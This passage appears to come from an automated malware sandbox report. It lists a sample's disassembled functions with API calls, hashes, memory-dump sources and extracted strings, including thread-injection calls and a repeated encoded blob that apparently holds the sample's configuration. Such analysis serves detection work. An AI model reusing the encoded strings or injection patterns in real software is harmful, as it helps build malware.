                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004AA149
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004AA156
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                        • String ID: |m
                                                                                                                                                        • API String ID: 1252875284-1421393795
                                                                                                                                                        • Opcode ID: 1abf85688dd182d65f0961bbec29b72d417175761eacfe9e6734b1329dfd7932
                                                                                                                                                        • Instruction ID: 6ec8eaabeddcd1618dbc1e8d3d26a91558b9d6a6e7710c7514235d19a62cc3eb
                                                                                                                                                        • Opcode Fuzzy Hash: 1abf85688dd182d65f0961bbec29b72d417175761eacfe9e6734b1329dfd7932
                                                                                                                                                        • Instruction Fuzzy Hash: 3B11C172A002299BCF14EFA4D805AEE7775EF85760F10465EE814A72A1EB389A01C7E5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004212CA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004212CF
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004212E1
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 00421336
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00421353
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042135C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$ExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow___std_exception_copystd::exception::exception
                                                                                                                                                        • String ID: Ltm$bad locale name
                                                                                                                                                        • API String ID: 1828584202-2471048373
                                                                                                                                                        • Opcode ID: 7142ac579b55a35f1f74f10dd141a91dca338ae5621cd0382d8abb402cfcbcf8
                                                                                                                                                        • Instruction ID: 9890a89c2960c8bb68dc70dba8565e33c127c2420d335e7ba1109c091d020dfa
                                                                                                                                                        • Opcode Fuzzy Hash: 7142ac579b55a35f1f74f10dd141a91dca338ae5621cd0382d8abb402cfcbcf8
                                                                                                                                                        • Instruction Fuzzy Hash: 0E21AC71C05788DEDB21DFA9854428EFFE0AF29304F5086AED08993642C3745604CB9A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069C86C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 269201875-2802557318
                                                                                                                                                        • Opcode ID: 3cbf1aa78a68228950788c115d416e17b48c51f98c525e5944610e977fc8d383
                                                                                                                                                        • Instruction ID: 568b4ea377fdd5330b7526d0f557bfad17c2e5c22e8771228f9b8a5404a3a910
                                                                                                                                                        • Opcode Fuzzy Hash: 3cbf1aa78a68228950788c115d416e17b48c51f98c525e5944610e977fc8d383
                                                                                                                                                        • Instruction Fuzzy Hash: 1F41C432A002049FDF24DF78C981A99B7FAEF85724F154569E915EB781E731AD02CB84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00697E55, Relevance: 9.2, APIs: 6, Instructions: 200COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __cftoe
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4189289331-0
                                                                                                                                                        • Opcode ID: 29dd84a0f51a4d3f207cefab6d28973148a2ee372515a42654a82522631c247e
                                                                                                                                                        • Instruction ID: 043c48c5b03a7f0f5e0ac414548a58bdb406fb8df88ca7342530b02a3338730c
                                                                                                                                                        • Opcode Fuzzy Hash: 29dd84a0f51a4d3f207cefab6d28973148a2ee372515a42654a82522631c247e
                                                                                                                                                        • Instruction Fuzzy Hash: 62510A32918205ABDF649B688C41EFE77AFEF49330F24425DF914E7682DB31DD019668
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A0BBE, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                        • Opcode ID: 5cbccf2ec746fc6395dc3166b6b575f8ea0147201b3644236bc7e4bb9d042095
                                                                                                                                                        • Instruction ID: a3c49d9c97eb9abf4e5523c122bc2db6f79bb6e9e60c19d617dd198d7e22cff2
                                                                                                                                                        • Opcode Fuzzy Hash: 5cbccf2ec746fc6395dc3166b6b575f8ea0147201b3644236bc7e4bb9d042095
                                                                                                                                                        • Instruction Fuzzy Hash: 72F0443699860266E70233346E0AF5E265F8FC3731F200219FA06D2692EE758C038A79
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00416021, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00416039
                                                                                                                                                        • _strlen.LIBCMT ref: 00416066
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001), ref: 00416087
                                                                                                                                                        • WSAStringToAddressW.WS2_32(?,?,00000000,?,00000080), ref: 0041609C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressByteCharErrorLastMultiStringWide_strlen
                                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                                        • API String ID: 211062275-2422070025
                                                                                                                                                        • Opcode ID: 1f04952744154bd24812894aceee2d9f310019820355fa6d513936dcd10ed0a4
                                                                                                                                                        • Instruction ID: 45b6e31451a696ebdf8162b1767b6627ffe4b77538a480277cbf2d8a7ccc63e0
                                                                                                                                                        • Opcode Fuzzy Hash: 1f04952744154bd24812894aceee2d9f310019820355fa6d513936dcd10ed0a4
                                                                                                                                                        • Instruction Fuzzy Hash: 6241F631A00215BBDB209F64CC82BEABB65AF05730F21831AF964972D2C774AD808BD5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A262D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LCMapStringEx.KERNELBASE(?,006AAE40,?,?), ref: 006A2680
                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,006AAE40,006AAE40,?,?), ref: 006A269E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String
                                                                                                                                                        • String ID: )K7~$0A$LCMapStringEx
                                                                                                                                                        • API String ID: 2568140703-136148802
                                                                                                                                                        • Opcode ID: 68507d2b8a342a1d492fa053c767885ad2dce2f2b2a10aea697748712d61dfd6
                                                                                                                                                        • Instruction ID: 8f7a8ac9c0e874e10e02c2c66bc4f3061c6d0de80b33f6c256d115ca56c7a5a1
                                                                                                                                                        • Opcode Fuzzy Hash: 68507d2b8a342a1d492fa053c767885ad2dce2f2b2a10aea697748712d61dfd6
                                                                                                                                                        • Instruction Fuzzy Hash: 85011732541109BBCF026F94CC05DEE3F66EF1A754F054115FE052A260C6768971EB84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004147B3, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004147B8
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL ref: 004147C8
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 004147F6
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL ref: 0041481F
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00414869
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1633115879-0
                                                                                                                                                        • Opcode ID: 8fdaed5f7c015fe9c596e14a11157c45507024964963db78a75e272a6236ec80
                                                                                                                                                        • Instruction ID: 13efd0fbe7da5596678df0606f44014a84a54d848637f257077e134b5a9e488a
                                                                                                                                                        • Opcode Fuzzy Hash: 8fdaed5f7c015fe9c596e14a11157c45507024964963db78a75e272a6236ec80
                                                                                                                                                        • Instruction Fuzzy Hash: 7A31A979A00685DFCB10CF28C844B9ABBB5FF89710F14864EE82597341C7B4EA41CBE0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00414A42, Relevance: 7.5, APIs: 5, Instructions: 36synchronizationthreadinjectionCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00414A60
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00414A69
                                                                                                                                                        • TerminateThread.KERNEL32(?,00000000), ref: 00414A83
                                                                                                                                                        • QueueUserAPC.KERNELBASE(00414A15,?,00000000), ref: 00414A90
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00414A9B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3892215915-0
                                                                                                                                                        • Opcode ID: 5e3e5d901a608c263f5a7cebda31382c350fafe2ac7b73e32475c38ddc19fed6
                                                                                                                                                        • Instruction ID: 02003f10f6ab72df4e18e5c6eec2cd413363acaec7b802c44c6d24bfc3e12ecd
                                                                                                                                                        • Opcode Fuzzy Hash: 5e3e5d901a608c263f5a7cebda31382c350fafe2ac7b73e32475c38ddc19fed6
                                                                                                                                                        • Instruction Fuzzy Hash: 3AF06830945604FFDB105F64DC09B9A7BE9EF08721F10425AF52AD56E0DB716C408B95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0068BC0A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateThread.KERNELBASE(00000000,?,Function_0028BA2A,00000000,?,00000000), ref: 0068BC53
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00414B76,00000000,00000000,00414BED), ref: 0068BC5F
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0068BC66
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                        • String ID: KA
                                                                                                                                                        • API String ID: 2744730728-4133974868
                                                                                                                                                        • Opcode ID: f03f4714b120c0d2260c96cf6850c6dfecc8c05f8600240f4b76256747474cb3
                                                                                                                                                        • Instruction ID: 025e5160260aac0e4f3a92f7803d62a48f5ff617fadab46e5574becf89812903
                                                                                                                                                        • Opcode Fuzzy Hash: f03f4714b120c0d2260c96cf6850c6dfecc8c05f8600240f4b76256747474cb3
                                                                                                                                                        • Instruction Fuzzy Hash: 9E019E32501519ABCF25BFA1DC05DEF3F6BEF85320B011229F91587610DF718911CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0056912E, Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00569133
                                                                                                                                                        • new.LIBCMT ref: 00569160
                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(0000001C), ref: 00569183
                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00569880,?,?,?,0040F0A6), ref: 0056919A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateCriticalEventH_prologInitializeSection
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3158263371-0
                                                                                                                                                        • Opcode ID: dc10bd1624971c821cf25d3c5956cbef8b80f37fa3717023bc06ff32207e8d94
                                                                                                                                                        • Instruction ID: f08e23a47fe0b1e1402390d4541d1dd9a58de5f85cd406617624f3d28a9496c4
                                                                                                                                                        • Opcode Fuzzy Hash: dc10bd1624971c821cf25d3c5956cbef8b80f37fa3717023bc06ff32207e8d94
                                                                                                                                                        • Instruction Fuzzy Hash: 103144B08017009FDBA4DF68C8847967BE5FF08310F1046AEEC19DF28AE7B19548CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00414BED, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00414BF2
                                                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 00414C06
                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 00414C23
                                                                                                                                                        • SleepEx.KERNELBASE(000000FF,00000001), ref: 00414C2D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Event$H_prologSleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1765829285-0
                                                                                                                                                        • Opcode ID: 1190111deaea89fa6db9a9d5df70ac53f365eb90f77e91f7e88fb18ea6a56883
                                                                                                                                                        • Instruction ID: 9da58206ea6e4e3eb0070f73a500b79a91363b4be50457d16d78ad4f8da008e0
                                                                                                                                                        • Opcode Fuzzy Hash: 1190111deaea89fa6db9a9d5df70ac53f365eb90f77e91f7e88fb18ea6a56883
                                                                                                                                                        • Instruction Fuzzy Hash: 6BF06231A01614EFCB10DF98D899B98BBB5FF09322F108269F51A9B2D1C7349A40CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041F572, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: RLA$IA
                                                                                                                                                        • API String ID: 3519838083-3098375642
                                                                                                                                                        • Opcode ID: a51af9b66fa29a8804961d4f0b6f6d3e7cfc64ba6c9138da2710ccf716b2a0cd
                                                                                                                                                        • Instruction ID: 9641d5ab02b994db1dc217116a9365d7fad60ce60dbb0e251cd473c2b2568d20
                                                                                                                                                        • Opcode Fuzzy Hash: a51af9b66fa29a8804961d4f0b6f6d3e7cfc64ba6c9138da2710ccf716b2a0cd
                                                                                                                                                        • Instruction Fuzzy Hash: 2F2110B0901606DFC704CF5AD284689FFF5FF59310B6085BED0589B761D3B49A54CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0068BA2A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(0077A468,00000010), ref: 0068BA3D
                                                                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0068BA44
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorExitLastThreadUser
                                                                                                                                                        • String ID: 0A
                                                                                                                                                        • API String ID: 1750398979-538879246
                                                                                                                                                        • Opcode ID: e2722f737c087fbe76a0a4c0dad74e178bef07ce86aae8c1913d6dd0c4fce5fa
                                                                                                                                                        • Instruction ID: 24547f008b4913caee9b784aa2ff0c45e3990639c8d6e482cdaafb0397bf1ea2
                                                                                                                                                        • Opcode Fuzzy Hash: e2722f737c087fbe76a0a4c0dad74e178bef07ce86aae8c1913d6dd0c4fce5fa
                                                                                                                                                        • Instruction Fuzzy Hash: 42F0AFB1940604AFDB04BF74C90AAAD7B77FF45740F10014DF4125B2A2CBB5A941DBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00402285, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040228C
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 4,x$7576506552704f42
                                                                                                                                                        • API String ID: 4000879885-3411140026
                                                                                                                                                        • Opcode ID: 3cf6a7066791c7e5877e3d0ade200d5fd803c6439692efe7b2d71c019017ee0e
                                                                                                                                                        • Instruction ID: 69a51aa73b26a32fd51fbdb9c5f37be701549b831b3c189db83dd49bd784c764
                                                                                                                                                        • Opcode Fuzzy Hash: 3cf6a7066791c7e5877e3d0ade200d5fd803c6439692efe7b2d71c019017ee0e
                                                                                                                                                        • Instruction Fuzzy Hash: F3C08C2299E13028228832187807CEF014E8E4232036106BFB500612866C890C8302FE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004086E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 004086E7
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 004086E1, 004086E6, 004086EE
                                                                                                                                                        • d2x, xrefs: 004086EF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg$d2x
                                                                                                                                                        • API String ID: 4000879885-3847907344
                                                                                                                                                        • Opcode ID: a87bf4cd0fa9b9af44d310ba4f875e4d14452411580b6f66db05536678e71c73
                                                                                                                                                        • Instruction ID: 1f435ca18d71687c4f28e45de7e6c025a5cca28e9e9d8ddbcbee144203cb787f
                                                                                                                                                        • Opcode Fuzzy Hash: a87bf4cd0fa9b9af44d310ba4f875e4d14452411580b6f66db05536678e71c73
                                                                                                                                                        • Instruction Fuzzy Hash: E1C04C1299E630292589325C3C47CEB414E8EA6725356066FB514661826D891DC203FD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040492B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00404932
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • ,1x, xrefs: 0040493A
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040492C, 00404939
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: ,1x$/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-1788817417
                                                                                                                                                        • Opcode ID: 0faf67c822558dfc89f9d76b19c46e75df44d48d70398dd405ebc2279bb9a75c
                                                                                                                                                        • Instruction ID: f2c8d7a3de13e68e541c6dc70ad01e80001ad99fea3add82ba75c7797f1bf965
                                                                                                                                                        • Opcode Fuzzy Hash: 0faf67c822558dfc89f9d76b19c46e75df44d48d70398dd405ebc2279bb9a75c
                                                                                                                                                        • Instruction Fuzzy Hash: 2AC04C62D9E53429258432683847CEB414E8D96721366066FB510652816DC95E8602FE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00408FAB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00408FB2
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • <3x, xrefs: 00408FBA
